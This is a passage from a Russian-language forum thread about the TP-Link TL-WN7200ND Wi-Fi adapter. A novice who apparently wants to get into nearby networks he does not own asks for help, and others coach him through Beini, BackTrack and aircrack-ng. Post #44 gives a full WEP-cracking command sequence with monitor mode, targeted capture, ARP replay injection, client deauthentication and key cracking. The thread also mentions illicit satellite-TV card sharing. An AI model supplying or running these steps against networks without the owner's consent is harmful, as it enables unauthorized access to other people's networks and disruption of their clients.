Объявление

Свернуть
Пока нет объявлений.

TP-Link TL-WN7200ND

Свернуть
X
 
  • Фильтр
  • Время
  • Показать
Очистить всё
новые сообщения

    #31
    Написал в саппорт TP-Link... по поводу дров...
    Вот, что ответили...

    Здравствуйте.
    Купил адаптер tp-link TL-WN7200ND в Волгограде в сети DNS.
    Адаптером был бы очень доволен, если бы не драйвера...
    Мне необходимо тестировать и проверять на безопасность и прочее Wi-Fi сети.

    Вот что написано про работу драйверов на официальном сайте производителя программы CommView for WiFi для мониторинга беспроводных сетей.
    _ttp://www.tamos.ru/products/commwifi/technotes.php

    [-] Linksys WUSB600N и все адаптеры на чипсетах Ralink и Realtek

    •Драйверы этих адаптеров показывают неверный уровень сигнала (всегда один и тот же для всех пакетов) и неверную скорость передачи пакетов. Кроме того, в пакетах содержатся некорректные FCS-значения, поэтому отличить поврежденные и нормальные пакеты невозможно. Эти дефекты делают данные адаптеры непригодными для каких-либо серьезных задач мониторинга и анализа.
    •Поддерживаются только в операционных системах Windows Vista, Windows 2008 и Windows 7.
    •Использование packet injection посредством генератора пакетов невозможно.
    •Уровень шума недоступен.
    •При мониторинге сетей стандарта 802.11n перехват пакетов, посланных в режиме связки каналов (channel bonding) 40 МГц, невозможен. Это ошибка в драйвере адаптера, и мы не можем на нее повлиять.
    Аналогичные вопросы к драйверам этого устройства я встречал на многих форумах, где пользователи делятся опытом работы с TL-WN7200ND.

    Разрешите Вас попросить внести доработки и устранить выявленные ошибки драйвера для TL-WN7200ND.


    Здравствуйте.
    Адаптер построен на чипсете Ралинк RT3070 , который в свою очередь имеет официальную поддержку операционный сестем Win XP 32\64, Vista 32\64, Win7 32\64 , Linux, MAC. Вполне очевидно, что для мониторинга Wi-fi сетей и их безопасности нельзя использовать один адаптер, построенный на одном чипсете, т.к. как вы наверное сами знаете, разные чипсеты в разных условиях ведут себя по-разному. Кроме того вероятность конфликтов разных чипсетов очень велика, именно поэтому любой производитель рекомендует строить сети с использование только одного брэнда.
    По поводу драйверов - по данному вопросу, Вам следует обратиться к разработчикам Ralink.

    :-(((

    Комментарий


      #32
      гыг, а ты что хотел :)) linux чем и хорошо что он открытый и НИКТО НЕ НЕСЕТ ОТВЕСТВЕННОСТЬ за то что ты в нём делаешь. А теперь представь ты ставишь лиц.винду ставишь лиц. под винду драйвера и делаешь мерзкие дела :) Как ты думаешь подтянут производителей сих продуктов за то что они делают оборудование для негодяйских целей. Не зря в винде почти все драйвера карточек не могут использовать режим монитора.
      Это и есть один из минусов Linux - никто не отвечает за продукт своей головой :)
      Парень качай BackTrack 4 RC2, изучай , учись , только на пользу пойдет тебе изучение Linux.
      Cisco,Microtik на борту имеют свои подобные системы на базе linux.

      Меня до сих пор вставляет в Linux как моя беспроводная мышь активируется после того как вставишь в нетбук её брелок для передачи. 1-2 секунды . Винде это и не снилось. Тока всунул брелок и мышь работает.

      Если нравиться тема вардрайва то думаю это лучший стимул изучить заодно Linux. Тебе понравиться. Я пока пришел к тому что хотел научился дофига делать в Linux путем гугля и чтения забугорных сайтов.

      Ещё поищи "слитас" вроде его делали под ралинк - там вообще пару мегов образ чисто для aircrack.

      О сколько нам открытий чудных
      Готовят просвещенья дух
      И опыт, сын ошибок трудных,
      И гений, парадоксов друг,
      И случай, бог изобретатель...


      А.С. Пушкин

      Комментарий


        #33
        Раньше лазил в инет ч/з 3G модем от МТС. Всё работает. Винда ХР SP-3.
        Поставил Wi-Fi адаптер TP-Link-7200-usb антенка всенаправленная 5db в комплекте шла (МТС модем отключил).
        Нашлось много сетей, одна открытая... сигнал 42% по утилите идущей с драйвером TP-Link.

        Когда запускаю программку для "хитрого" просмотра спутникового ТВ НТВ+ (шаринг) всё идёт!!!
        Тоесть интернет есть!!!

        Но когда пытаюсь открыть любую ссылку через разные браузеры, то даже самые "лёгкие" странички грузятся по несколько минут, но так ни чего и не появляется... в конце концов в любом браузере загорается, что-то типа "не возможно отобразить"...

        А ТВ программка работает (правда у неё очень низкое потребление трафика, на МТСе я раньше засекал за сутки где-то 2МБ).

        Что я делаю не так???
        Раз инет идёт значит МАС не надо мне менять???
        Или я ошибаюсь, подскажите, пожалуйста ..... ????

        P.S. антивирь Аваст бесплатный тоже вроде как инет видит... пытается обновиться...

        P.S.S. Я ни чего ни куда не прописывал и не менял, просто соединяюсь через утилиту от дров...
        Подскажите, пожалуйста, надо ли в таком случае куда нибудь прописывать DNS сервера, основной шлюз и всё на свете ... :-)

        Простите за неграмотность в таких вещах....

        Комментарий


          #34
          Примерно посмотреть свою скорость можно на speedtest.net

          Видимо проблема в DNS у тебя.
          Пуск-выполнить - CMD
          в консоли набери ping 94.100.191.203 -t это пингуешь сайт mail.ru постоянно, пинг может немного скакать но если есть гуд.
          в консоли набери nslookup mail.ru например. Эта команда преобразовывает доменные имена в IP-адреса используя твой DNS.
          Если будет глюк с определением то жестко вбей в настройках сетевого подключение адрес DNS,обычно он такой же как и шлюз.
          Еще если примерно знаешь от кого Интернет у ТД то надо глянуть DNS провайдера. Может ТД коряво настроена.
          Посмотри еще пинги до шлюза.
          А если там (маловероятно но может быть) в сети DNS, отличный от шлюза то промониторить сеть ,в wireshark сливать что намониторил и смотреть куда лезут клиенты той ТД при DNS запросах.
          Еще можно попробовать openDNS
          их адреса DNS-серверов 208.67.222.222 и 208.67.220.220
          У меня Ростелеком работает на них.

          Комментарий


            #35
            Ох... ковыряю... изучаю сей "злой" девайс...

            Воткнул утилиту с дровами от Альфы (там вроде сигнал помощнее и утилита поинформативнее, вижу открытые точки, жму "подключиьться" в ответ "введите SSID".

            Что это??? Как ввести???
            Подскажите, пожалуйста...

            Комментарий


              #36
              SSID (Service Set Identifier) или еще называют ESSID— идентификатор беспроводной сети, название сетки WiFi.

              Комментарий


                #37
                Akson - спасибо огроменное!!! Что-то в голове начинает проясняться!!!

                Но "беда" в том, что прописались в утилите названия разных запароленных сеток, я одна (сигнал 47%) открытая...
                При соннекте просит SSID ввести, но у неё пробел в названии... вообще ни чего нет... пустота в строке утилиты, хотя МАС и всё прочее есть...

                И при соединении просит ввести SSID... Как быть ?????

                P.S. Прога WiFi Way работает с этой картой ???
                Скачал, записал образ на СД, загружаюсь появляется окошко выбираю верхнюю строку, пошел линух со службами, сточки побежали...
                Но потом стопор:фатальная ошибка... и тока перезагрузка...

                Эта прога работает с этой картой???
                Или у меня диск битый, подскажите, пожалуйста... ???

                Комментарий


                  #38
                  P.S.
                  Закатал Beini 1.2.1 на СД.
                  Всё стартует... но ни какой "соски"-ярлыка нет...
                  Похоже и эта прога не видит мой адаптер.... :-(((
                  Как узнать что "Беини" мой адаптер видит ??? или дело в версии проги ???

                  Комментарий


                    #39
                    Сообщение от Eduardf2000 Посмотреть сообщение
                    Akson - спасибо огроменное!!! Что-то в голове начинает проясняться!!!

                    Но "беда" в том, что прописались в утилите названия разных запароленных сеток, я одна (сигнал 47%) открытая...
                    При соннекте просит SSID ввести, но у неё пробел в названии... вообще ни чего нет... пустота в строке утилиты, хотя МАС и всё прочее есть...

                    И при соединении просит ввести SSID... Как быть ?????

                    P.S. Прога WiFi Way работает с этой картой ???
                    Скачал, записал образ на СД, загружаюсь появляется окошко выбираю верхнюю строку, пошел линух со службами, сточки побежали...
                    Но потом стопор:фатальная ошибка... и тока перезагрузка...

                    Эта прога работает с этой картой???
                    Или у меня диск битый, подскажите, пожалуйста... ???
                    WIFIWay я на нетбуке загружал в VESA режиме. Потом выбор языка и загрузка .
                    Все подхватывает и загружает , стоят патченные драйвера по сравнению с BTRC2.

                    Комментарий


                      #40
                      Можно ли спросить ссылку на эти дрова ???
                      Я установил вместе с утилитой дрова от Альфы...
                      Теперь в диспетчере: дата 10.09.2010, версия 3.1.4.1501...

                      Подбирал... но увы...
                      Фото прилагаю...
                      40 минут "Беини" промучал... вроде и пакетов много...
                      Можете подсказать, что не так ????
                      Вложения

                      Комментарий


                        #41
                        Вот здесь почитай , и ручками все поделай.
                        _ttp://aircrack-ng.org/doku.php?id=simple_wep_crack
                        _ttp://aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients

                        Ключ --help у команд выдает справку.
                        А то что ты сделал - атака фрагментированными пакетами, посмотри сколько у тебя потерянных пакетов и кол-во beacon сигналов ты минут за 5 просто "убил" сеть.

                        Не надо гадить там где хочешь получить бонусы.

                        Забудь про эти программы пока ручками не научишься делать сам и не поймешь смысл. Потом и в программах сразу начнешь разбираться.

                        Почитай про aircrack-ng и потестируй на беини.

                        Комментарий


                          #42
                          Akson ещё раз спасибо Вам за то что время на просвещение обучающихся тратите... !!!

                          Можно ли ещё спросить пояснения ???
                          1. Ключ --help где набирать ??? В командной строке ???
                          2. Какой вид атаки мне выбирать, чтобы ни какую сеть по не знанию не прибить... атака фрагментированными пакетами... назовите закладочку пожалуйста...
                          3. Я делал всё точь в точь по обучающему видео ролику выложенному на оф. сайте "Веини"... каким же мне видео роликом по "Веини" лучше воспользоваться... Дайте, пожалуйста, ссылочку...

                          Там на официальном сайте Beini _ttp://www.ibeini.com/videos.htm
                          есть аж 7 видеоинструкций...
                          Подскажите, пожалуйста по какой из них мне двигаться ???
                          Последний раз редактировалось Виталий; 16.04.2013, 13:06.

                          Комментарий


                            #43
                            1. в консоле , пример: airodump-ng --help
                            2. в зависимости от сети, для начала начни с простого , просто слушать и собирать пакеты с wep и opn - сетей.
                            _ttp://project.net.ru/security/article9/index.html
                            3. делал... не понимая сути что делал.
                            Выше есть ссылки с сайта aircrack-ng. Там достаточно информации и в доступной форме.

                            Комментарий


                              #44
                              Akson спасибо!!!
                              Тут мне "подбросили" такой совет по пользованию БТ-4.
                              airmon-ng start wlan0
                              airodump-ng --channel 8 --write output --bssid 00:19:5B:E7:58:89 mon0
                              aireplay-ng --arpreplay -e linksys -b 00:19:5B:E7:58:89 -h 00:12:17:94:90:34 mon0
                              aireplay-ng --deauth 10 -a 00:19:5B:E7:58:89 -c 00:12:17:94:90:34 mon0
                              aircrack-ng output*.cap

                              Ну только соответственно свои данные цифровые вводить (МАС, канал и т.д.)...

                              После введения первой строки определяется мой адаптер.
                              Вторую строку ввожу - запускается перехват пакетов airodump.

                              Но как дальше ввести третью строку???
                              Командная часть (строка) пропала???
                              Подскажите, пожалуйста, какую клавишу нажать чтобы иметь возможность увидеть командную строку для ввода третьей строки из "пошаговой инструкции" ???

                              Фото прилагаю: _ttp://zalil-slil.ifolder.ru/22559027
                              Последний раз редактировалось Виталий; 16.04.2013, 13:06.

                              Комментарий


                                #45
                                После второй строки у тебя включился экран монитора твоей сети. Чтобы ввести третью строку - слева внизу есть кнопочка в консоли в виде папки со звездочкой, нажмешь один раз - добавиться еще одна вкладка в консоли и туда вводишь команду. Будет у тебя Shell , Shell No.2 и т.д.

                                Комментарий

                                Обработка...
                                X